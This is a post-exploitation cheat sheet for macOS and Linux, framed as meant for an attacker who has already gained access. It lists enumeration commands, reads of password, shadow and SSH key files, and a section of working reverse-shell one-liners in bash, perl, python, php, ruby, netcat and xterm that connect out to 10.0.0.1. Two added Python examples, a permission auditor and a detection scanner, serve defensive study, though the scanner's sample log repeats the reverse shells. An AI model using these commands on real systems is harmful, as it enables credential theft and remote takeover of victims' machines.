OSX Post-Exploitation Command List: Disclaimer

This document provides a list of commands for post-exploitation on OSX systems. It includes commands for gathering system information, networking configuration, installed packages, finding important files, remote access, and privilege escalation. The list is intended to be helpful for an attacker who has gained access to an OSX system.

Uploaded by ravenkill

OSX Post-Exploitation Command List

If for any reason you cannot access/edit these files in the future, please contact mubix@hak5.org

You can download these files in any format using Google Doc’s File->Download As method

If you are viewing this on anything other than Google Docs then you can get access to the latest links to
the Linux/Unix/BSD, OSX, and Windows docs here: https://bitly.com/nuc0N0

DISCLAIMER: Anyone can edit these docs, and all that entails and infers

Table of Contents
OSX Post-Exploitation Command List
Table of Contents
Blind Files
SYSTEM
Networking
Configs
Packages
Finding Important Files
Files to pull
Remote System Access
Priv

Blind Files
(things to pull when all you can do is blindly read, e.g. via LFI or directory traversal)
● /etc/resolv.conf (everyone always has read on this and it won't trigger an IDS)

SYSTEM
● uname -a
● sw_vers -productName
● sw_vers -productVersion
● system_profiler
● id
● printenv
● who
● ps aux
● ps ea
● /Library/Application Support/VMware Fusion/vmrun list
○ /Library/Application Support/VMware Fusion/vmrun CopyFileFromHostToGuest windowsmalicious.exe WindowsVM
○ /Library/Application Support/VMware Fusion/vmrun captureScreen WindowsVM
● Snow Leopard and Lion
○ dscacheutil -q user
○ dscacheutil -q group
● Tiger
○ lookupd -q user
○ lookupd -q group

Networking
● ifconfig
● netstat -np tcp
● netstat -np udp

Configs
● ls -alh /private/etc/
● ls -alh /Library/Application Support/VMware Fusion/

Packages
● port installed
● ls -alh /Applications/

Finding Important Files


● ls -ma ~/
● ls -alh /Users/
● ls -alh /Users/*/.ssh/
● ls -alh /Users/*/.gnupg/
● ls -alh /Volumes/

Files to pull

Remote System Access


Priv
● cat /Library/Application Support/Objective Development/Little Snitch/rules.xpl
● ipfw list

The current Linux list:

(let's remove anything that doesn't work (or doesn't mean anything) on OS X)

# System
● uname -a
● ps aux
● ps -aef
● id
● arch
● w
● who -a
● gcc -v
● mysql --version
● perl -v
● ruby -v
● python --version
● df -k
● mount
● last -a

● lastlogin (*bsd)
● getenforce
● dmesg
● lspci
● lsusb
● lshw

● free -m
● du -h --max-depth=1 /
● which nmap (see if it’s already installed)
● locate bin/nmap
● which nc (see if it’s already installed)
● locate bin/<whatever you want>
● whoami
● jps -l
● java -version

# Networking
● hostname -f
● ip addr show
● ifconfig -a
● route -n
● cat /etc/network/interfaces
● iptables -L -n
● netstat -anop
● netstat -r
● netstat -nltupw (root with raw sockets)
● arp -a
● lsof -nPi

# Configs
● ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null
● cat /etc/issue{,.net}
● cat /etc/passwd
● cat /etc/shadow (gotta try..)
● cat /etc/shadow~ # (sometimes there when edited with gedit)
● cat /etc/master.passwd
● cat /etc/group
● cat /etc/hosts
● cat /etc/crontab
● cat /etc/sysctl.conf
● for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
● cat /etc/resolv.conf
● cat /etc/samba/smb.conf
● pdbedit -L -w
● pdbedit -L -v
● cat /etc/exports
● cat /etc/auto.master
● cat /etc/auto_master
● cat /etc/fstab
● cat /etc/exports
● find /etc/sysconfig/ -type f -exec cat {} \;
● cat /etc/sudoers

#Package Sources
● cat /etc/apt/sources.list
● ls -l /etc/yum.repos.d/
● cat /etc/yum.conf

# Finding Important Files


● find /var/log -type f -exec ls -la {} \;
● ls -alhtr /mnt
● ls -alhtr /Volumes
● ls -alhtr /tmp
● ls -alhtr /home
● ls /Users/*/.ssh/*
● find /home -type f -iname '.*history'
● ls -lart /etc/rc.d/
● locate tar | grep [.]tar$
● locate tgz | grep [.]tgz$
● locate sql | grep [.]sql$
● locate settings | grep [.]php$
● locate config.inc | grep [.]php$
● ls /Users/*/id*
● locate .properties | grep [.]properties # java config files
● locate .xml | grep [.]xml # java/.net config files
● find /sbin /usr/sbin /opt /lib $(echo $PATH | sed 's/:/ /g') -perm -4000 # find suids
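The `ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx` filter under Configs and the `find ... -perm -4000` line above both work by testing permission bits. The following is an added audit-side example (not part of the original list): it parses constructed `ls -l` lines, makes the world-writable / setuid / setgid conditions explicit, and shows why the `grep -v lrwx` is needed (symlinks print as `lrwxr-xr-x`, which also matches the world-write regex). The sample lines are constructed, not output from any real host.

```python
"""Parse `ls -l` mode strings and flag what the awk world-write filter
and the find -perm -4000 line are probing for. Added audit example;
the sample output below is constructed."""
import re
from dataclasses import dataclass
from typing import List

# Constructed sample `ls -la` lines (not real output from any host).
SAMPLE_LS_OUTPUT = """\
-rw-r--r--   1 root  wheel     347 Jan  1 10:00 hosts
-rw-rw-rw-   1 root  wheel    1024 Jan  1 10:00 sudoers.tmp
lrwxr-xr-x   1 root  wheel      11 Jan  1 10:00 localtime -> /var/db/tz
-rwsr-xr-x   1 root  wheel   53248 Jan  1 10:00 ping
-rwxr-sr-x   1 root  wheel   22000 Jan  1 10:00 wall
drwxrwxrwt   1 root  wheel      64 Jan  1 10:00 tmp
"""

# 10-char mode string, optionally followed by macOS's '@' (xattrs) or '+' (ACL).
MODE_RE = re.compile(r'^[-dlbcps][rwxsStT-]{9}[@+]?$')


@dataclass
class Finding:
    name: str
    mode: str
    issues: tuple


def parse_mode(mode: str) -> dict:
    """Break a mode string into the bits that matter for an audit."""
    if not MODE_RE.match(mode):
        raise ValueError(f"not a mode string: {mode!r}")
    mode = mode[:10]  # drop the trailing '@' / '+' flag if present
    return {
        "type": mode[0],
        "setuid": mode[3] in "sS",      # -perm -4000 in find terms
        "setgid": mode[6] in "sS",      # -perm -2000
        "other_write": mode[8] == "w",  # what the awk regex /w.$/ keys on
        "sticky": mode[9] in "tT",
    }


def audit_ls_output(text: str) -> List[Finding]:
    """Return entries that are world-writable (sticky dirs excluded),
    setuid or setgid. Symlinks are skipped, which is what `grep -v lrwx`
    does in the original pipeline."""
    findings = []
    for line in text.splitlines():
        parts = line.split(None, 8)
        if len(parts) < 9:       # 'total N' lines and blanks
            continue
        mode, name = parts[0], parts[8].split(" -> ")[0]
        bits = parse_mode(mode)
        if bits["type"] == "l":
            continue
        issues = []
        if bits["other_write"] and not bits["sticky"]:
            issues.append("world-writable")
        if bits["setuid"]:
            issues.append("setuid")
        if bits["setgid"]:
            issues.append("setgid")
        if issues:
            findings.append(Finding(name, mode[:10], tuple(issues)))
    return findings


if __name__ == "__main__":
    for f in audit_ls_output(SAMPLE_LS_OUTPUT):
        print(f"{f.mode}  {f.name}: {', '.join(f.issues)}")
```

Sticky world-writable directories such as `/tmp` are deliberately not reported: the awk regex in the list does match `drwxrwxrwt`, so expect that noise when running the one-liner as written.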

# Per User
● ls -alh /Users/*/
● ls -alh /Users/*/.ssh/
● cat /Users/*/.ssh/authorized_keys
● cat /Users/*/.ssh/known_hosts
● cat /Users/*/.*hist*
● find /Users/*/.vnc /Users/*/.subversion -type f
● grep ^ssh /Users/*/.*hist*
● grep ^telnet /Users/*/.*hist*
● grep ^mysql /Users/*/.*hist*
● cat /Users/*/.viminfo
● sudo -l # if sudoers is not readable, this sometimes works per user
● crontab -l

# Priv (sudo’d or as root)


● ls -alh /root/
● cat /etc/sudoers
● cat /etc/shadow
● cat /etc/master.passwd # OpenBSD
● cat /var/spool/cron/crontabs/*
● lsof -nPi

● ls /Users/*/.ssh/*

# Reverse Shell
starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
● bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # No /dev/tcp on Mac OS X
● perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
● python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
● php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
● ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
● nc -e /bin/sh 10.0.0.1 1234 # note: need -l on some versions, and many do NOT support -e anymore
○ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
● xterm -display 10.0.0.1:1
○ Listener- Xnest :1
○ Add permission to connect- xhost +victimIP
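Every one-liner in this section leaves a distinctive trace in the process command line (a `/dev/tcp/` path, `mkfifo` piped into `nc`, `socket.socket(` followed by `dup2(` and `/bin/sh`, and so on), which is what a defender keys on. The following is an added detection example, not part of the original list: it scans process-execution log lines for those markers plus the user-enumeration and password-file reads listed earlier, and escalates per user. The log format (timestamp, user, pid, command line, tab-separated) and the sample lines are constructed for this example, not a real EDR or auditd schema.

```python
"""Detection example (added; not from the original list): flag process
command lines that match the reverse-shell and enumeration one-liners
catalogued above. Log format is an assumption for this example."""
import re
from typing import Dict, List, Set, Tuple

# One regex per pattern in the list. Names ending in "-shell" are
# high-severity on their own; the rest are routine admin activity and
# only become interesting alongside a shell-type hit.
RULES: List[Tuple[str, re.Pattern]] = [
    ("bash-dev-tcp-shell",   re.compile(r'/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+')),
    ("mkfifo-nc-shell",      re.compile(r'mkfifo\s+\S+.*\|\s*nc\s+\S+\s+\d+')),
    ("nc-exec-shell",        re.compile(r'\bnc\b.*\s-e\s*/bin/(?:ba)?sh')),
    ("python-dup2-shell",    re.compile(r'socket\.socket\(.*dup2\(.*/bin/(?:ba)?sh')),
    ("perl-socket-shell",    re.compile(r'use\s+Socket;.*connect\(.*exec\(')),
    ("php-fsockopen-shell",  re.compile(r'fsockopen\(.*(?:exec|system|passthru)\(')),
    ("ruby-tcpsocket-shell", re.compile(r'TCPSocket\.open\(.*exec')),
    ("xterm-display-shell",  re.compile(r'\bxterm\s+-display\s+\S+:\d')),
    ("user-enum",            re.compile(r'^(?:dscacheutil|lookupd)\s+-q\s+(?:user|group)')),
    ("shadow-read",          re.compile(r'\bcat\s+/etc/(?:shadow|master\.passwd)\b')),
]

# Constructed sample log: timestamp<TAB>user<TAB>pid<TAB>command line.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z\tjdoe\t4101\tls -la /Users/jdoe
2024-01-01T10:00:05Z\twww\t4102\tdscacheutil -q user
2024-01-01T10:00:09Z\twww\t4103\tpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
2024-01-01T10:00:12Z\twww\t4104\trm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
2024-01-01T10:00:20Z\tjdoe\t4105\tgit status
2024-01-01T10:00:25Z\twww\t4106\tcat /etc/master.passwd
"""


def parse_line(line: str) -> Dict[str, object]:
    """Split one assumed-format log line into its fields."""
    ts, user, pid, cmd = line.split("\t", 3)
    return {"ts": ts, "user": user, "pid": int(pid), "cmd": cmd}


def match_rules(cmd: str) -> List[str]:
    """Names of every rule whose pattern appears in the command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan(log_text: str) -> List[Dict[str, object]]:
    """Return the events that matched at least one rule, rule names attached."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        names = match_rules(str(event["cmd"]))
        if names:
            hits.append({**event, "rules": names})
    return hits


def triage(hits: List[Dict[str, object]]) -> Dict[str, str]:
    """Per user: 'critical' if any shell-type rule fired, else 'review'.
    Enumeration and password-file reads are normal for admins, so they
    are surfaced but not escalated on their own."""
    by_user: Dict[str, Set[str]] = {}
    for h in hits:
        by_user.setdefault(str(h["user"]), set()).update(h["rules"])  # type: ignore[arg-type]
    return {
        user: ("critical" if any(r.endswith("-shell") for r in rules) else "review")
        for user, rules in by_user.items()
    }


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h["ts"], h["user"], h["pid"], ",".join(h["rules"]))
    print(triage(found))
```

The regexes are intentionally anchored on structure (`mkfifo ... | nc host port`, `socket.socket( ... dup2( ... /bin/sh`) rather than on the literal `10.0.0.1`/`1234` values from the list, so trivially changed addresses or ports still match; the trade-off is that heavily obfuscated or base64-wrapped variants need a separate rule.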

